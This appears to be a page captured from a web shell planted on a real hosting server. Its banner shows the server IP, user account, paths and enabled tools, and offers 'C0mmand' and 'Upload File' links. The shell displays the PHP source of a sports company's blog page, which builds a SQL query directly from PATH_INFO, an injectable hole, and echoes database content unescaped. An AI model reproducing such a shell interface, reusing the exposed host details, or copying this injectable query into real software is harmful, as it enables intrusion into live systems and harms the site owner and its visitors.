Server IP : 103.53.40.154 / Your IP : 3.147.62.99 Web Server : Apache System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : ppcad7no ( 715) PHP Version : 8.2.25 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0750) : /home2/ppcad7no/activesports.co.in/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<?php include_once('admin/config.php'); $slug_name = $_GET['slug']; if(isset($_SERVER['PATH_INFO'])){ $slug_name=$_SERVER['PATH_INFO']; $querydt="SELECT * FROM `tbl_causes` WHERE `slug`='$slug_name'"; $rundt = mysqli_query($db,$querydt) or die("Query Not run"); $datadt = mysqli_fetch_assoc($rundt); } ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title> <?php echo $datadt["meta_title"];?> </title> <meta name="description" content="<?php echo $datadt["meta_desc"];?>"> <?php include 'top-link.php';?> </head> <body> <?php include 'header.php';?> <!-- breadcrumb area --> <div class="breadcrumb-area breadcrumb-padding bg-img" style="background-image:url(<?php echo $wspath?>admin/images/<?php echo $datadt['image'];?>)"> <div class="container"> <div class="breadcrumb-content text-center"> <h1 style="color:white;"><?php echo $datadt["title"];?></h1> <ul> <li><a href="<?php echo $wspath?>">Home</a></li> <li><i class="fa fa-angle-right"></i></li> <li><a href="<?php echo $wspath?>blogs.html">Blogs</a></li> <li><i class="fa fa-angle-right"></i></li> <li><?php echo $datadt["title"];?></li> </ul> </div> </div> </div> <!-- Service details area --> <div class="section section-padding"> <div class="container"> <div class="service-details-content"> <div class="row text-center pb-2"> <div class="col"> <img src="<?php echo $wspath?>admin/images/<?php echo $datadt['image'];?>" alt="<?php echo $datadt['title'];?>"> </div> </div> <?php echo $datadt['desc'];?> <!--<h2 class="title">How to get this service?</h2>--> <!--<p>Begin by researching Active Sports and their portfolio to ensure that their style and expertise align with your project requirements. You can visit their website, read client testimonials, and review their past projects. Once you are satisfied, proceed with initial contact. </p>--> <!--<p>After the initial contact, Active Sports may schedule a consultation to discuss your project in detail. This could be done in person, over the phone, or through video conferencing. During this meeting, you can share your ideas, requirements, and expectations for the project. The architects will ask questions to understand your needs better and may provide initial insights and suggestions.</p>--> <div class="service-details-btn text-center mt-lg-10 mt-md-7 mt-5"> <a href="<?php echo $wspath?>contact.html" class="btn btn-primary btn-hover-dark animated">Contact Us</a> </div> </div> </div> </div> <?php // include 'testimonial.php'; ?> <?php include 'footer.php';?>